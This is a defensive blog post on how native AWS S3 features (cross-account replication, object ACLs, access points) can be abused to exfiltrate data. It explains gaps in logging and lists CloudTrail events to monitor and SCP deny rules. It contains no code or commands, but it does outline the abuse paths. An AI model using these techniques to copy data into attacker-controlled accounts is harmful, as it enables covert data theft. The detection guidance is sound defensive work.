Data exfiltration with native AWS S3 features
Over the last few years, malicious actors have turned to pairing data exfiltration with Ransomware (coined ‘double extortion’ attacks) to increase the likelihood of getting paid by their victims. The frequency of attacks that featured legitimate initial access also reinforces the need to have robust internal detections for suspicious behaviour from valid credentials. With that in mind, this article is the result of spending some time understanding different options for abuse of legitimate S3 features with the end goal of data exfiltration. The intent of deep diving on these features was to better understand the shortcomings of native AWS logging and monitoring tooling, and to offer up some suggestions for how to go about detecting their use and abuse.
S3 data replication
S3 data replication provides the ability to copy objects to another bucket, which can be useful from an enterprise logging, integration or security perspective. This can be carried out to buckets in the same account, or an unrelated account. Where this feature could be abused is where a malicious actor could input a replication policy to copy objects to an attacker controlled bucket. Objects will continue to be replicated for as long as the policy in place, whereby presenting a convenient stream of backdoored data for an attacker.
Cross account replication is relatively straightforward to set up, requiring a role assumable by s3 with replication and list/get based permissions, and a configured bucket policy on the attacker controlled account. Unfortunately a newly configured replication policy is not reported on by IAM Access Analyzer, presumably because Access Analyzer focuses on objects being shared — as distinct from new copies of the objects being distributed.
Abuse of legitimate functionality can be challenging, particularly given the limited visibility afforded. Options to defenders are to keep a watchful eye for:
- Unknown PutBucketReplication or CreateJob events in the Cloudtrail Management trail. The CreateJob event is generated when an s3 Batch operation job has been created, indicating that all existing objects in a bucket are being replicated across, as opposed to only future s3 objects.
- Unknown PutBucketVersioning events (a pre-requisite of bucket replication) on existing s3 buckets, recorded by the Cloudtrail Management trail.
- When an encrypted object is replicated, KMS Decrypt/Encrypt events will appear in a Cloudtrail Management trail, with a principalID and sts assumed role prefixed with s3-replication. Encryption events referencing KMS keys outside your known AWS accounts or ecosystems would be of particular interest — as this references the key being used in the destination account. At minimum, the IAM role carrying out the replication will require implicit usage of the KMS key used to encrypt the objects in the source bucket. Key policy modification events (PutKeyPolicy) may indicate an attempt to fulfil some of the replication pre-requisites.
Defenders can use SCPs to control usage (Deny PutBucketReplication) of s3 object replication in an account, outright denying it or only allowing specific use cases. Failing that, detection based on anomalous usage or modification outside known pipelines are also an option.
Object ACLs
Access Control Lists (ACLs) are a means through which object level permissions are able to be delegated to differing groups of users, accounts or anonymous (public) users. AWS has taken steps to reduce their use, with default disabling of ACLs entirely slated for implementation in April 2023. Where ACLs are not disabled for an s3 bucket, they can be applied at the bucket or object level . It is the object ACLs that are arguably the stealthier of the two.
There are a few factors that make Object level ACLs difficult to detect:
- When assigning permissions to another account via an ACL (Account Grantee), a long alphanumerical string called a canonical ID is used as opposed to an account ID. From a detection perspective, understanding whether an object/s have been shared outside of your organisation is difficult without maintaining a list of known canonical IDs.
- As the action is characterised as an object level operation, the event (PutObjectAcl) does not appear in the Cloudtrail management event stream. Administrators will need to configure Cloudtrail data events with s3 write events enabled in order to log these events. The pricing implications associated with data trails can lead to trade-off discussions, where some accounts may not have all data trail event types enabled.
- The sharing of objects outside of an account boundary (as distinct from the whole bucket), is not captured by IAM Access Analyzer.
Object level ACLs toe the line between management and data plane events, and so create some difficulties in how changes in their permissions are recorded. Block Public Access functionality will override the ability of actors to designate anonymous or authenticated AWS users as ACL grantees, but the sharing of objects to a specific user or account is still feasible. Mitigating these techniques entirely rely on restricting the use of ACLs in s3 buckets or by utilising customer managed KMS in governed by least privilege principles. Where object level permissions are still needed, these types of activities can be alerted on by detecting:
- ACLs referencing unknown canonical IDs, URIs or email grantees.
- Unusual levels of PutObjectAcl calls. Given that each object requires a separate API call, a large number may indicate a mass exfiltration attempt.
S3 Access Points
s3 Access points are a relatively new feature, that enable users to scope a particular entry point for interaction with s3 objects. This can become particularly helpful where there’s a requirement to have distinct access policies and network controls for prefixes within an s3 bucket. Access points have the ability to be configured to allow traffic from the Internet, or to a specific VPC endpoint.
Unfortunately, configuring an access point referencing a vpc outside of your account does not appear to generate an IAM Access Analyzer finding. Additionally, object level API actions related to S3 access points falls under it’s own Cloudtrail data event category (S3 Access Points); not intuitively falling under s3 as some may assume. The impact is that those not selecting all data trail event categories may be left blind to this vector.
There are a few options, albeit limited, that you can look for:
- Creation of s3 access points generate a CreateAccessPoint event in Cloudtrail management trails. Monitoring these events, paying attention to any referencing an unknown vpc ID.
- One configuration option for Access Points is to delegate the management of permissions of objects in the bucket to the Access Point, as opposed to in the Bucket Policy. Modifications to bucket policies (PutBucketPolicy) with reference to conditions like s3:DataAccessPointAccount, s3:DataAccessPointArn or s3:AccessPointNetworkOrigin; may indicate this intention.
- Monitoring of Cloudtrail Data Events with the S3 Access Point data event type enabled. Of particular interest would be abnormal downloads of s3 objects from IPs outside of your known ranges.
Where s3 access points are not required in your accounts, it may be easier to disable their creation via SCPs (Deny CreateAccessPoint).
In Summary
AWS has built one of the most flexible platforms of the major cloud providers. The trade-off of the feature rich platform is a challenging, dynamic ecosystem that defenders need to continue to evaluate and react to changing conditions and TTPs. The above features only represent a small cross section of the available techniques for attackers, and reiterates the need for defenders to think offensively. Hopefully this article has inspired some new detections that you can implement in your own environment.
If you’ve made it this far, thanks for coming along for the journey. If you have any feedback related to my writing style or content, I’d be all ears. You can find me on twitter at @masterofnone02 or masterofnone@infosec.exchange on Mastodon.